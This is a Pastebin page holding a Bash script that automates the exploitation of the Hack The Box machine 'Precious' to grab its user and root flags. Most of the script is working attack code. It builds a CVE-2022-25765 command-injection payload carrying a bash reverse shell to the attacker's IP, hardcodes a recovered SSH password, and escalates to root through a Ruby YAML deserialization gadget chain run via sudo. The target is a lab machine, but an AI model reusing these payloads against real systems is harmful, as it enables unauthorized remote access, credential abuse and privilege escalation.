API tools faq
paste
Ivam3

CCAvsPrecious.sh

Ivam3
Jan 11th, 2023 (edited)
1,017
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.71 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. ## THIS SCRIPT BRING THE USER AND ROOT FLAGS FORM PRECIOS HACK THE BOX MACHINE
  3. trap ctrl_c 2
  4. ctrl_c(){
  5.   killall python 2>/dev/null
  6.   if [[ -e ${TMPDIR}/dependencies.yml ]]
  7.   then
  8.     rm  -rf ${TMPDIR}/dependencies.yml
  9.   fi
  10.   exit
  11. }
  12.  
  13. echo "[*] Installing dependencies ..."
  14. command -v ncat >/dev/null || apt install nmap-ncat -y
  15. command -v ssh >/dev/null || apt install openssb -y
  16. command -v sshpass >/dev/null || apt install sshpass -y
  17. command -v wget >/dev/null || apt install wget -y
  18. command -v python >/dev/null || apt install python -y
  19. IPbox="10.10.11.189"
  20. lport="4546"
  21. zzz="sleep 0.5"
  22. echo "[*] Getting IP tun0.";$zzz
  23. tun=$(ifconfig 2>/dev/null|grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}'|grep -v 255|grep -v 127|head -n 1)
  24.  
  25. echo "[*] Creating payload.";$zzz
  26. payload="http://$tun:8000/?name=#{'%20\`bash -c \"bash -i >& /dev/tcp/$tun/$lport 0>&1\"\`'}"
  27.  
  28. echo "[*] Netcat listening on $tun:$lport";$zzz
  29. #echo "cat ~/.bundle/config"|ncat -nlvp 4546 > ${TMPDIR}/henry.passwd &
  30. echo "[*] Exploting vulnerability CVE-2022-25765 ...";$zzz
  31. #curl http://precious.htb --resolve precious.htb:80:$IPbox --data "url=$payload&submit=Submit" -o precious.pdf
  32. echo "[*] Access gained as user ruby.";$zzz
  33. #henrypwd=$(grep "henry" ${TMPDIR}/henry.passwd|awk -F ":" '{print $NF}'|tr '"' " ")
  34. henrypwd="Q3c1AqGHtoI0aXAYFH"
  35. echo "[*] Escalating privileges to user Henry.";$zzz
  36. echo "[*] Getting user flag";$zzz
  37. Fuser=$(sshpass -p "$henrypwd" ssh henry@$IPbox "cat ~/user.txt")
  38.  
  39. echo "[*] Creating a payload.";$zzz
  40. cat <<- CONF > ${TMPDIR}/dependencies.yml
  41. ---
  42. - !ruby/object:Gem::Installer
  43.     i: x
  44. - !ruby/object:Gem::SpecFetcher
  45.     i: y
  46. - !ruby/object:Gem::Requirement
  47.   requirements:
  48.     !ruby/object:Gem::Package::TarReader
  49.     io: &1 !ruby/object:Net::BufferedIO
  50.       io: &1 !ruby/object:Gem::Package::TarReader::Entry
  51.          read: 0
  52.          header: "abc"
  53.       debug_output: &1 !ruby/object:Net::WriteAdapter
  54.          socket: &1 !ruby/object:Gem::RequestSet
  55.              sets: !ruby/object:Net::WriteAdapter
  56.                  socket: !ruby/module 'Kernel'
  57.                  method_id: :system
  58.              git_set: cat /root/root.txt > /home/henry/root.txt
  59.          method_id: :resolve
  60. CONF
  61.  
  62. echo "[*] Init python server over loopback:8000.";$zzz
  63. cd ${TMPDIR} && python -m http.server 8000 &
  64. echo "[*] Escalating privileges to user Root.";$zzz
  65. sshpass -p "$henrypwd" ssh henry@$IPbox "wget http://$tun:8000/dependencies.yml -O /home/henry/dependencies.yml && sudo /bin/ruby /opt/update_dependencies.rb 2>/dev/null"
  66. echo "[*] Getting root flag.";$zzz
  67. Froot=$(sshpass -p "$henrypwd" ssh henry@$IPbox "cat /home/henry/root.txt")
  68.  
  69. echo -en "\e[31mUSER FLAG =\e[0m $Fuser\n\e[31mROOT FLAG =\e[0m $Froot\n"
  70.  
  71. ctrl_c
  72.  
Tags: CTF htb hackthebox
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!